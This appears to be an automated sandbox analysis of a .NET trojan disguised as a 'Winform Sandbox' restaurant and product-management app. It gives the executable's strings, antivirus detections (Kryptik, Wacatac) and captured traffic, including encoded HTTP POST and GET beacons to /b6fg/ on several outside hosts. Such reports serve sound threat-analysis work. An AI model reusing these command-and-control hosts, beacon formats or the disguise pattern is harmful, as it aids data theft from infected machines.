mscorlib System.Runtime.Versioning.TargetFrameworkAttribute
System.Windows.Forms System.Windows.Forms.Form
mscorlib System.Collections.Generic.List`1
System System.ComponentModel.IContainer
System.Windows.Forms System.Windows.Forms.ComboBox
System.Windows.Forms System.Windows.Forms.Label
System.Windows.Forms System.Windows.Forms.Button
System.Windows.Forms System.Windows.Forms.ListBox
mscorlib System.Object
mscorlib System.EventArgs
mscorlib System.Decimal
mscorlib System.Enum
mscorlib System.Runtime.CompilerServices.CompilerGeneratedAttribute
mscorlib System.Diagnostics.DebuggerBrowsableState
mscorlib System.Diagnostics.DebuggerBrowsableAttribute
mscorlib System.Collections.Generic.List`1/Enumerator
mscorlib System.Reflection.Assembly
mscorlib System.Type
mscorlib System.Reflection.MethodInfo
mscorlib System.STAThreadAttribute
System System.CodeDom.Compiler.GeneratedCodeAttribute
mscorlib System.Diagnostics.DebuggerNonUserCodeAttribute
mscorlib System.Resources.ResourceManager
mscorlib System.Globalization.CultureInfo
System.Drawing System.Drawing.Bitmap
System System.ComponentModel.EditorBrowsableState
System System.ComponentModel.EditorBrowsableAttribute
System System.Configuration.ApplicationSettingsBase
System.Windows.Forms System.Windows.Forms.DataGridView
System.Windows.Forms System.Windows.Forms.DataGridViewTextBoxColumn
System.Windows.Forms System.Windows.Forms.DataGridViewCellEventArgs
System System.ComponentModel.INotifyPropertyChanged
System System.ComponentModel.PropertyChangedEventHandler
mscorlib System.Collections.Generic.IList`1
mscorlib System.Collections.Generic.ICollection`1
mscorlib System.Collections.Generic.IEnumerable`1
mscorlib System.Collections.IEnumerable
mscorlib System.Guid
System System.ComponentModel.BindingList`1
System System.ComponentModel.ListSortDirection
System System.ComponentModel.PropertyDescriptor
mscorlib System.IComparable
System.Windows.Forms System.Windows.Forms.GroupBox
System.Windows.Forms System.Windows.Forms.TextBox
mscorlib System.Exception
System.Windows.Forms System.Windows.Forms.DataGridViewRow
System.Windows.Forms System.Windows.Forms.DataGridViewCellStyle
System.Xml System.Xml.Serialization.XmlSerializer
System.Data System.Data.DataSet
System.Data System.Data.DataTable
System.Windows.Forms System.Windows.Forms.BindingSource
System.Windows.Forms System.Windows.Forms.ListBox/ObjectCollection
System.Windows.Forms System.Windows.Forms.Control
System.Windows.Forms System.Windows.Forms.ListControl
mscorlib System.IDisposable
System.Windows.Forms System.Windows.Forms.AutoCompleteMode
System.Windows.Forms System.Windows.Forms.AutoCompleteSource
System.Drawing System.Drawing.Point
System.Drawing System.Drawing.Size
mscorlib System.EventHandler
System.Windows.Forms System.Windows.Forms.ButtonBase
System.Drawing System.Drawing.SizeF
System.Windows.Forms System.Windows.Forms.ContainerControl
System.Windows.Forms System.Windows.Forms.AutoScaleMode
System.Windows.Forms System.Windows.Forms.Control/ControlCollection
mscorlib System.Convert
mscorlib System.AppDomain
mscorlib System.Reflection.MethodBase
System System.ComponentModel.Container
System.Windows.Forms System.Windows.Forms.Application
mscorlib System.RuntimeTypeHandle
System System.Configuration.SettingsBase
System.Windows.Forms System.Windows.Forms.ControlBindingsCollection
System.Windows.Forms System.Windows.Forms.Binding
System.Windows.Forms System.Windows.Forms.DataGridViewCellEventHandler
System System.ComponentModel.ISupportInitialize
System.Windows.Forms System.Windows.Forms.DataGridViewColumnHeadersHeightSizeMode
System.Windows.Forms System.Windows.Forms.DataGridViewColumnCollection
System.Windows.Forms System.Windows.Forms.DataGridViewColumn
System.Windows.Forms System.Windows.Forms.DataGridViewBand
System.Windows.Forms System.Windows.Forms.DataGridViewAutoSizeColumnMode
System.Drawing System.Drawing.Font
System.Drawing System.Drawing.FontStyle
System.Drawing System.Drawing.GraphicsUnit
mscorlib System.Delegate
mscorlib System.Threading.Interlocked
System System.ComponentModel.PropertyChangedEventArgs
mscorlib System.Collections.ObjectModel.Collection`1
System.Windows.Forms System.Windows.Forms.DataGridViewRowCollection
mscorlib System.Math
mscorlib System.String
mscorlib System.Comparison`1
System System.ComponentModel.ListChangedEventArgs
System System.ComponentModel.ListChangedType
mscorlib System.StringComparison
System.Windows.Forms System.Windows.Forms.MessageBox
System.Windows.Forms System.Windows.Forms.DialogResult
System.Data System.Data.DataRowCollection
System.Data System.Data.DataRow
System.Windows.Forms System.Windows.Forms.BorderStyle
System.Windows.Forms System.Windows.Forms.TextBoxBase
System.Windows.Forms System.Windows.Forms.ScrollBars
System.Drawing System.Drawing.Color
System.Windows.Forms System.Windows.Forms.DataGridViewTriState
System.Windows.Forms System.Windows.Forms.DataGridViewSelectedRowCollection
System.Windows.Forms System.Windows.Forms.DataGridViewCellCollection
System.Windows.Forms System.Windows.Forms.DataGridViewCell
System.Windows.Forms System.Windows.Forms.DataGridViewAutoSizeColumnsMode
System.Windows.Forms System.Windows.Forms.DataGridViewAutoSizeRowsMode
System.Windows.Forms System.Windows.Forms.DataGridViewContentAlignment
System.Drawing System.Drawing.SystemColors
System.Windows.Forms System.Windows.Forms.DataGridViewEditMode
System.Windows.Forms System.Windows.Forms.DataGridViewRowHeadersWidthSizeMode
System.Windows.Forms System.Windows.Forms.DataGridViewSelectionMode
System.Windows.Forms System.Windows.Forms.FormStartPosition
System.Windows.Forms System.Windows.Forms.FormBorderStyle
System.Windows.Forms System.Windows.Forms.FormClosingEventHandler
System.Data System.Data.XmlReadMode
System.Data System.Data.DataTableCollection
System.Windows.Forms System.Windows.Forms.DockStyle

!This program cannot be run in DOS mode.
.text
`.rsrc
@.reloc
*BSJB
v4.0.30319
#Strings
#GUID
#Blob
IEnumerable`1
ICollection`1
Comparison`1
IList`1
SortableBindingList`1
label1
Form1
dataGridView1
groupBox1
label2
button3
Class3
get_unify4
<Module>
SizeF
get_NBvpxSEgawBvbTH
labelTM
textBoxTM
SDSDSDS
CVVVVVVVVV
value__
System.Data
SaveData
mscorlib
System.Collections.Generic
get_Id
add_Load
OrderForm_Load
buttonAdd
OnListChanged
add_SelectedIndexChanged
lstOrder_SelectedIndexChanged
cbMenus_SelectedIndexChanged
add_PropertyChanged
remove_PropertyChanged
INotifyPropertyChanged
Interlocked
set_Enabled
set_FormattingEnabled
_isSorted
Synchronized
PopulateDataGrid
SelectedGroupDataGrid
GroupsDataGrid
NewGuid
<Id>k__BackingField
<Price>k__BackingField
<ProductsTable>k__BackingField
<Title>k__BackingField
<Name>k__BackingField
<GroupName>k__BackingField
<ProductName>k__BackingField
<MenuType>k__BackingField
<TradeMark>k__BackingField
<Description>k__BackingField
<PhoneNumber>k__BackingField
<SkuNumber>k__BackingField
<Supplier>k__BackingField
<ProductDetails>k__BackingField
<OrderItems>k__BackingField
<MenuItems>k__BackingField
<StorageUnit>k__BackingField
<Category>k__BackingField
DataGridViewBand
buttonAmend
SBind
GetMethod
get_Price
set_Price
get_TotalPrice
RefreshTotalPrice
lblTotalPrice
labelPrice
textBoxPrice
defaultInstance
set_DataSource
set_AutoCompleteSource
BindingSource
source
XmlReadMode
set_AutoScaleMode
set_AutoCompleteMode
set_RowHeadersWidthSizeMode
DataGridViewRowHeadersWidthSizeMode
set_AutoSizeMode
set_ColumnHeadersHeightSizeMode
DataGridViewColumnHeadersHeightSizeMode
DataGridViewAutoSizeColumnMode
set_SelectionMode
DataGridViewSelectionMode
set_WrapMode
set_AutoSizeColumnsMode
DataGridViewAutoSizeColumnsMode
set_AutoSizeRowsMode
DataGridViewAutoSizeRowsMode
set_EditMode
DataGridViewEditMode
AddRange
CompareExchange
get_WhiteSmoke
Invoke
DataTable
get_ProductsTable
set_ProductsTable
IComparable
IEnumerable
IDisposable
dtable
set_RowHeadersVisible
RuntimeTypeHandle
GetTypeFromHandle
numberOfPeople
get_Title
set_Title
DockStyle
get_DefaultCellStyle
set_DefaultCellStyle
set_ColumnHeadersDefaultCellStyle
DataGridViewCellStyle
set_BorderStyle
set_FormBorderStyle
FontStyle
get_Name
set_Name
PersonName
get_GroupName
set_GroupName
groupName
labelPrName
textBoxPrName
get_ProductName
set_ProductName
set_DataPropertyName
Combine
set_Multiline
Phone
ListChangedType
GetType
get_MenuType
set_MenuType
Compare
get_IsSortedCore
get_SupportsSortingCore
get_SortDirectionCore
GroupCore
RemoveSortCore
ApplySortCore
get_SortPropertyCore
get_Culture
set_Culture
resourceCulture
MethodBase
ButtonBase
ApplicationSettingsBase
TextBoxBase
Close
Dispose
Delegate
DebuggerBrowsableState
EditorBrowsableState
DataGridViewTriState
Delete
get_White
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
labelCatalogue
get_Value
GetValue
value
buttonSave
Remove
KLretdEyph.exe
set_Size
set_MinimumSize
set_MaximumSize
set_AutoSize
set_ClientSize
myserialize
ISupportInitialize
IndexOf
get_Tag
set_Tag
System.Threading
Binding
System.Runtime.Versioning
FromBase64String
ToString
GetString
MainForm_Closing
add_FormClosing
disposing
Operating
System.Drawing
ShowDialog
KLretdEyph
set_MaxLength
buttonAdd_Click
add_Click
buttonAmend_Click
buttonDelete_Click
buttonSave_Click
buttonCancel_Click
btnClearMenus_Click
buttonEdit_Click
buttonExit_Click
btnAddMenu_Click
btnRemoveMenu_Click
buttonShow_Click
set_Dock
get_TradeMark
set_TradeMark
ToDecimal
Label
buttonCancel
System.Collections.ObjectModel
System.ComponentModel
WinformsSandbox.ComponentModel
IGroupsViewModel
get_GroupsViewModel
set_GroupsViewModel
_groupsViewModel
DataGridViewCell
System.Xml
ReadXml
WriteXml
GetFromXml
get_Control
ContainerControl
ListControl
Program
get_Item
AddItem
get_SelectedItem
get_DataBoundItem
RemoveItem
MenuItem
menuItem
System
EditDeleteAddForm
MainForm
OrderForm
AddEditForm
ShowForm
labelStoreUn
textBoxStoreUn
resourceMan
Vegetarian
AppDomain
get_CurrentDomain
DataGridViewColumn
DataGridViewTextBoxColumn
Application
set_Location
System.Configuration
System.Globalization
System.Xml.Serialization
System.Reflection
DataTableCollection
DataGridViewCellCollection
ControlCollection
DataGridViewColumnCollection
ControlBindingsCollection
ObjectCollection
DataRowCollection
DataGridViewSelectedRowCollection
DataGridViewRowCollection
ListSortDirection
_sortDirection
direction
set_StartPosition
FormStartPosition
Exception
get_Description
set_Description
StringComparison
OnComparison
IPerson
Button
CompareTo
MethodInfo
CultureInfo
get_Gainsboro
Bitmap
set_TabStop
IGroup
GetRandomGroup
Clear
set_ValueMember
get_PhoneNumber
set_PhoneNumber
get_SkuNumber
set_SkuNumber
sender
PhoneOrder
_currentOrder
lstOrder
get_ResourceManager
ProductsManager
get_Supplier
set_Supplier
labelSupplier
textBoxSupplier
PropertyChangedEventHandler
FormClosingEventHandler
DataGridViewCellEventHandler
System.CodeDom.Compiler
IContainer
add_RowEnter
GroupsDataGrid_RowEnter
remove_RowEnter
get_Silver
XmlSerializer
set_GridColor
set_BackgroundColor
set_ForeColor
set_SelectionForeColor
set_BackColor
set_UseVisualStyleBackColor
set_SelectionBackColor
GetEnumerator
.ctor
.cctor
PropertyDescriptor
System.Diagnostics
WinformsSandbox.Models.Interfaces
WinformsSandbox.ViewModels.Interfaces
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
ProductsManager.EditDeleteAddForm.resources
ProductsManager.MainForm.resources
Restaurant.OrderForm.resources
ProductsManager.AddEditForm.resources
ProductsManager.ShowForm.resources
WinformsSandbox.Properties.Resources.resources
WinformsSandbox.Views.GroupsView.resources
DebuggingModes
AcceptChanges
WinformsSandbox.Properties
get_Tables
EnableVisualStyles
WinformsSandbox.Models.Classes
WinformsSandbox.ViewModels.Classes
get_DataBindings
Settings
ListChangedEventArgs
PropertyChangedEventArgs
DataGridViewCellEventArgs
Equals
get_ProductDetails
set_ProductDetails
labelProductDetails
textBoxProductDetails
get_Cells
get_Controls
get_Items
get_OrderItems
set_OrderItems
get_MenuItems
set_MenuItems
System.Windows.Forms
Contains
get_Columns
set_AutoGenerateColumns
set_AutoScaleDimensions
System.Collections
groupBoxButtons
IGroups
get_Groups
set_Groups
_groups
set_ScrollBars
SystemColors
labelProducts
components
cbMenus
InitializeAvailableMenus
_availableMenus
btnClearMenus
WinformsSandbox.Views
get_Rows
set_AllowUserToAddRows
get_SelectedRows
set_AllowUserToDeleteRows
set_AllowUserToResizeRows
Concat
Format
GetObject
set_MultiSelect
Product
ProductDirDataSet
get_Highlight
buttonEdit
EndInit
BeginInit
get_StorageUnit
set_StorageUnit
GraphicsUnit
buttonExit
get_Default
SetCompatibleTextRenderingDefault
DialogResult
Restaurant
set_Alignment
DataGridViewContentAlignment
InitializeComponent
get_Current
Point
set_Font
get_Count
get_RowCount
Convert
RandomPersonSourceList
get_SelectedGroupBindingList
set_SelectedGroupBindingList
_selectedGroupBindingList
get_GroupsBindingList
set_GroupsBindingList
_groupsBindingList
SuspendLayout
ResumeLayout
PerformLayout
MoveNext
get_Text
set_Text
get_ControlText
set_HeaderText
get_HighlightText
get_WindowText
labelSku
textBoxSku
btnAddMenu
btnRemoveMenu
DataGridView
GroupsView
DataRow
DataGridViewRow
get_Window
buttonShow
get_Index
set_TabIndex
get_SelectedIndex
get_RowIndex
rowIndex
index
MessageBox
set_MaximizeBox
ComboBox
GroupBox
ListBox
TextBox
WinformsSandbox
get_Assembly
set_ReadOnly
RestaurantLibrary
get_Category
set_Category
labelCategory
textBoxCategory
op_Inequality
_sortProperty
WrapNonExceptionThrows
Winform Sandbox
Copyright
2017 - 2020
$D7AFF0CC-F635-4140-A9B4-0FEA7D211F60
1.98.4.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
16.1.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
hSystem.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aPADPAD
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
IDATx^
y*S_;
tbyx_
+K)kWL
q9IK/c
\{N|.
] vm9
~h6vu
B7{%O
6Y[qvw*m
h%D"5
?lhPt
}k#6D
b8UeC
E{@[j
gT: sn
!=FWg
ymPq-
_wD7o
A!(WK
a~2g[
5Fquh,
/T,Da
F3fTk&
gLML)
lM`dJ6=
3d7)2
S9h':
tf\C;
nhC^@
C51~r
"'t>wc
a1CfX027
J:R5*
3fe!rM
_7Xx`+*
4!J--ZF
awyl[A
(<|Il
gT-4%
%u/Q2P!
1fllc
kA8^A
s=V0Ve0
~ iI1
sWY7.
xe!xt9
P-7!^
8vG^V
{;G*%
9RQ#qwS)
$_;Tf
Z/GLh
vn7WM
dN6c|
]B\KvH
j?>9e
Pkv)?c
-#Tu#s7?FvxW
Lq"Cf
WFp`g
e96OgS
h=w(*#E
>2Zm(c
ukVL8F
?g ?k
~ iI1
8+F5$qW
4#y=W
[;B]t
!:<VX
B^`%7
!x{gv
w5)57f
#|vKa
a[K|p
6|ASN/
J8 Re_
+z2i\
F6,J#
R*Ncn
FyF.KSn
?abZK
I ~f_%tF
m5#2o"
Y"4<U7
|P^D;
?WO&)
9b5Go
M\_&lb!
>HdUH6
T3&Si&
NeX[]
kzB^ov?
cF.>O
#7q#>
=OZc:
)U0%q
f11TU
}L/;@L
-[Ve"
Xr[q"{
xze,dI
"mz$C
<=..'kq
F=`4o
gpLj2W
/pRu$N
bm/s!
k[Qfm
}"/i0n
Y4l.w
}w&`V
fQR0O
8[#IQ
p7\@S
GY?v%
;"Cx[
7&I"t,R
E`T v[
n&|AG
fLuU(
#)6^l
F.O#D
fWXc&
l[PHs
s%p,e
}+Cu[
%bW!r
:Q9[wM
5m)nMn
t#Jw11
.0fn_
$fm)&
2?ar.
p*KGkb
o\4xE
KqK:#
/=D^W5.
p[7K2>L|
[*i/'
GWIDAT+*
l"Oo<b
HSV$b
p\k%%
_\^c.I
NkuiZ
qx%{*
'6h$r
yT|?A
}4'vY
|h#3j
h49JR
rK=Qk6
3:Qyw
CUk7l/$
~ q7/&W
,|XAF
s0i~N
&K3V#w4
wADTe2R89
q;&y-c
56O9EhA%
Na4)+[pr
7lcE<u
Y'DHS
rXm99
1|>JQ
EdyeC
iM6<t
}8-)w
;InM=Ek
v|6*Ie
I&)(J
,3^FS7G
bd+D'
S?jWN
YX//d
obVd#Z
o$`]O\~
Kx*k_X1
ic1r]c
;3oA4
=72cl4
^Xz5S
P{rk?
iqZj(
Ja5,{
3#p{U
;jrlc#^
p[u1g~
0;{3}
[2s'(
HBi8'-
VcQX7*
BMO}Nt
As(>f
JE4bn
LHy,w
as$"m
fV8(r
6bDb>
kX+/C
a|(#~I
<YF[/
dQ1WF
"B~"3
Re"{t
VO!#n=
<=o"k6
;Ru'iU
,mz$m
}i/~K
_q_x~9
p?-O'}+
fLh5N
Tpn(B
_\5xe1
@mbJ|0*P
Y1stGK
XQ F6H
D>kMCHOY
j8szi:~
z~uP#j
n. i`
Ldwf0
"M_VJ
VlW)!6
]Tn'[
@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
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
RSDS`:
C:\Users\Administrator\Desktop\Client\Temp\qpXUooSbAd\src\obj\Debug\KLretdEyph.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Fries
These are some fries
ner Pizza
Turkish Pizza
This is a turkish pizza
Vega Burger
This is a vegetarian hamburger
Double Cheeseburger
This is a double cheeseburger
Grilled Salmon
This is a grilled salmon
cbMenus
label1
Menu:
btnAddMenu
lstOrder
btnClearMenus
Clear
btnRemoveMenu
Remove
label2
Totalprice:
lblTotalPrice
OrderForm
NBvpxSEgawBvbTH
AMD_Isotopes.Processors
StartGame
WinformsSandbox
Form1
Group of Groups!
WinformsSandbox.Properties.Resources
unify4
DataSource
GroupsBindingList
SelectedGroupBindingList
SelectedGroupDataGrid
PersonName
GroupsDataGrid
GroupName
Group Name
Roboto
GroupsView
Groups
{Random Group:
Leonor Halberg
Emil Hardin
Fredda Tardif
Regenia Kearley
Antonietta Batie
Rikki Melnyk
Claire Younger
Mindy Smale
Fredricka Vining
Maribeth Corum
Dagmar Paulson
Ariane Rexroat
Kristyn Drakeford
Susan Debose
Marisol Felter
Lenore Costner
Mitch Tremblay
Madie Penn
Eduardo Gloster
Ardella Bongiorno
Gertude Sherburne
Basilia Leger
Brianna Fleener
Kristian Langlois
Billi Torgerson
Tawnya Berenbaum
Ma Fritze
Lilly Ketchum
Lourie Snook
Brice Spece
Zenia Wilke
Leland Mccaslin
Sanjuanita Slemp
Elwanda Nasser
Melody Cockerham
Roseann Mcgillis
Jesse Sheffield
Lavona Dolloff
Raisa Holst
Regan Schoenberg
Gearldine Pettry
Ilene Mahr
Mitchell Rethman
Britney Riddell
Signe Shuman
Valery Solie
Sherril Portwood
Moshe Lirette
Renata Rael
Jefferey Brendel
Vallie Eidt
Nadia Wine
Neomi Mole
Jannette Gambrell
Tomika Graeber
Ricki Purdom
Martine Tetrault
Dorotha Dashiell
Shaunda Demko
Nereida Chisum
Joy Besaw
Bernardine Winebrenner
Omega Segawa
Patrina Morones
Buddy Sowell
Mahalia Landrum
Fleta Luft
Helen Le
Darlene Borton
Lai Lamont
Winona Lapan
Annie Romero
Samantha Crone
Tamela Weatherwax
Denyse Bosket
Margurite Estabrook
Sebastian Hassell
Joshua Brittingham
Clay Hudspeth
Loriann Burditt
Keshia Poplawski
Karissa Paugh
Annamarie Drees
Tifany Johnosn
Essie Critchfield
Eleanore Bradeen
Deidre Chauez
Santo Limbaugh
Fermina Spinelli
Deonna Higby
Ute Fouts
Joesph Speno
Timothy Fritz
Irene Houze
Brock Lambright
Buffy Claybrooks
Jarod Hofstetter
Holley Mousseau
Bettye Soderberg
Tammera Strebel
Editing
Please, put price in correct format!
Please, fill in all fields!!!
groupBoxButtons
Microsoft Sans Serif
buttonCancel
Cancel
buttonSave
Adding Products:
textBoxSku
labelSku
SKU Number
labelCategory
Category
textBoxCategory
labelTM
Trade Mark
textBoxTM
labelPrName
Product Name
textBoxPrName
labelSupplier
Supplier
textBoxSupplier
labelPrice
Price, UAH
textBoxPrice
labelStoreUn
Storage Unite
textBoxStoreUn
labelProductDetails
Product Details
textBoxProductDetails
AddEditForm
Adding product
Product Editing:
dataGridView1
buttonAdd
Add Product
buttonEdit
Edit Product
button3
Delete Product
groupBox1
buttonExit
EditDeleteAddForm
Products Amending
buttonShow
Show products
buttonAmend
Amend Products
Arial Narrow
labelProducts
Products
labelCatalogue
Catalogue
MainForm
ProductsDirectory.xml
SKU Number =
, Category =
, Trade Mark =
,Product Name =
, Product Details =
, Supplier =
Price = {0}, Storage Unit = {1}
ShowForm
Show Products
NBvpxSEgawBvbTH
unify4
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Winform Sandbox
FileVersion
1.98.4.0
InternalName
KLretdEyph.exe
LegalCopyright
Copyright
2017 - 2020
LegalTrademarks
OriginalFilename
KLretdEyph.exe
ProductName
Winform Sandbox
ProductVersion
1.98.4.0
Assembly Version
1.98.4.0

Full Results

Engine Signature Engine Signature Engine Signature
Bkav Clean MicroWorld-eScan Clean FireEye Clean
CAT-QuickHeal Clean ALYac Clean Cylance Unsafe
Zillya Clean SUPERAntiSpyware Clean Sangfor Malware
K7AntiVirus Clean Alibaba Clean K7GW Clean
Cybereason Clean Arcabit Clean Invincea Clean
Baidu Clean F-Prot Clean Symantec Clean
TotalDefense Clean APEX Malicious Paloalto generic.ml
ClamAV Clean Kaspersky UDS:DangerousObject.Multi.Generic BitDefender Clean
NANO-Antivirus Clean AegisLab Clean Avast Clean
Tencent Clean Ad-Aware Clean TACHYON Clean
Emsisoft Clean Comodo Clean F-Secure Clean
DrWeb Clean VIPRE Clean TrendMicro Clean
MaxSecure Trojan.Malware.300983.susgen Trapmine Clean CMC Clean
Sophos Clean SentinelOne Clean Cyren W32/MSIL_Troj.WM.gen!Eldorado
Jiangmin Clean Webroot Clean Avira Clean
Fortinet Clean Antiy-AVL Clean Kingsoft Clean
Endgame Clean Microsoft Trojan:Win32/Wacatac.C!ml ViRobot Clean
ZoneAlarm UDS:DangerousObject.Multi.Generic Avast-Mobile Clean Cynet Clean
AhnLab-V3 Clean Acronis Clean McAfee Clean
MAX Clean VBA32 Clean Malwarebytes Trojan.MalPack.ADC
Zoner Clean ESET-NOD32 a variant of MSIL/Kryptik.WPS TrendMicro-HouseCall Clean
Rising Clean Yandex Clean Ikarus Clean
eGambit Clean GData Clean BitDefenderTheta Clean
AVG Clean Panda Clean CrowdStrike Clean
Qihoo-360 Clean
Sorry! No behavior.

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 50.63.202.41 [VT] United States
N 34.102.136.180 [VT] United States
N 199.192.30.223 [VT] United States
Y 1.1.1.1 [VT] Australia

TCP

Source Source Port Destination IP Destination Host Destination Port
192.168.1.3 49195 199.192.30.223 www.magentos.info 80
192.168.1.3 49196 199.192.30.223 www.magentos.info 80
192.168.1.3 49197 34.102.136.180 www.callisterlawgroup.com 80
192.168.1.3 49198 50.63.202.41 www.xinhby.com 80

UDP

Source Source Port Destination Destination Port
192.168.1.2 137 192.168.1.3 137
192.168.1.3 51758 1.1.1.1 53
192.168.1.3 54002 1.1.1.1 53
192.168.1.3 55379 1.1.1.1 53
192.168.1.3 56304 1.1.1.1 53
192.168.1.3 58700 1.1.1.1 53
192.168.1.3 58760 1.1.1.1 53
192.168.1.3 58801 1.1.1.1 53
192.168.1.3 59714 1.1.1.1 53
192.168.1.3 60012 1.1.1.1 53
192.168.1.3 60886 1.1.1.1 53
192.168.1.3 61201 1.1.1.1 53
192.168.1.3 61586 1.1.1.1 53
192.168.1.3 62365 1.1.1.1 53
192.168.1.3 62670 1.1.1.1 53
192.168.1.3 62763 1.1.1.1 53
192.168.1.3 63458 1.1.1.1 53
192.168.1.3 63737 1.1.1.1 53
192.168.1.3 137 192.168.1.255 137
192.168.1.3 55379 8.8.8.8 53
192.168.1.3 56304 8.8.8.8 53
192.168.1.3 58801 8.8.8.8 53
192.168.1.3 59714 8.8.8.8 53
192.168.1.3 61201 8.8.8.8 53
192.168.1.3 62670 8.8.8.8 53
192.168.1.3 62763 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.biblebeater.com [VT] NXDOMAIN
www.296djw.info [VT]
www.belinv.com [VT]
www.magentos.info [VT] A 199.192.30.223 [VT] 199.192.30.223 [VT]
www.callisterlawgroup.com [VT] A 34.102.136.180 [VT] 34.102.136.180 [VT]
www.evntmonitor.com [VT]
www.xinhby.com [VT] A 50.63.202.41 [VT] 50.63.202.40 [VT]
www.thekoulenresidence.com [VT]
www.8800pe.com [VT]
www.quantumpearlpoc.com [VT]
www.venglishhouse.com [VT] 153.127.214.206 [VT]
www.robynhoodofretail.info [VT]
www.mohajrannoor.com [VT]
www.sgknox.com [VT] 104.247.82.10 [VT]
www.descubriendonoruega.com [VT] 88.99.186.213 [VT]

HTTP Requests

URI Data
http://www.magentos.info/b6fg/
POST /b6fg/ HTTP/1.1
Host: www.magentos.info
Connection: close
Content-Length: 162
Cache-Control: no-cache
Origin: http://www.magentos.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.magentos.info/b6fg/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

Y2sDANLX=KtBmgHvKKOhxI2(uYkKNu_ScDyONxHnAybYqZhlknErXW_NMyX(sKnwNbKrIQ3AkX3~t4OIcYWP9itfij6(4(8R6lDl2bpFDzPo6lfyqFasfoHAMv2E0UIUsWLJz3F24CptttZis7VMNkvWBGyOTQJA.
http://www.magentos.info/b6fg/?Y2sDANLX=Fv1c+gXtWYBCQk+xHwP156qcIQ+60UnD2N5efydHvXLARdkbiTKxZWIKUbnnbBYJS02k6g==&bj=UTpLQHTh5TvhP
GET /b6fg/?Y2sDANLX=Fv1c+gXtWYBCQk+xHwP156qcIQ+60UnD2N5efydHvXLARdkbiTKxZWIKUbnnbBYJS02k6g==&bj=UTpLQHTh5TvhP HTTP/1.1
Host: www.magentos.info
Connection: close

http://www.callisterlawgroup.com/b6fg/?Y2sDANLX=i86svkdPMuoSeDhhFJ4e6n6wN6gQMedHqObOsSeLdahcNU70hhRUteckpwABhiEVdYZs9Q==&bj=UTpLQHTh5TvhP&gi-s=ApXDCv_H
GET /b6fg/?Y2sDANLX=i86svkdPMuoSeDhhFJ4e6n6wN6gQMedHqObOsSeLdahcNU70hhRUteckpwABhiEVdYZs9Q==&bj=UTpLQHTh5TvhP&gi-s=ApXDCv_H HTTP/1.1
Host: www.callisterlawgroup.com
Connection: close

http://www.xinhby.com/b6fg/?Y2sDANLX=DPbGDB5TD6UfGrq05TzqLuMXD+LK6vv4sTGjEb5I8sepxxHDnXsT2ICuKauJmHVONNAp7Q==&bj=UTpLQHTh5TvhP&kUVn=H0HdZlj0
GET /b6fg/?Y2sDANLX=DPbGDB5TD6UfGrq05TzqLuMXD+LK6vv4sTGjEb5I8sepxxHDnXsT2ICuKauJmHVONNAp7Q==&bj=UTpLQHTh5TvhP&kUVn=H0HdZlj0 HTTP/1.1
Host: www.xinhby.com
Connection: close

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol GID SID REV Signature Category Severity
2020-06-30 13:56:02.577 192.168.1.3 [VT] 49180 13.107.42.23 [VT] 443 TCP 1 2028397 2 ET JA3 Hash - Possible Malware - Various Malspam/RigEK Unknown Traffic 3

Suricata TLS

Timestamp Source IP Source Port Destination IP Destination Port Subject Issuer Fingerprint Version
2020-06-30 13:56:02.686 192.168.1.3 [VT] 49180 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2

Suricata HTTP

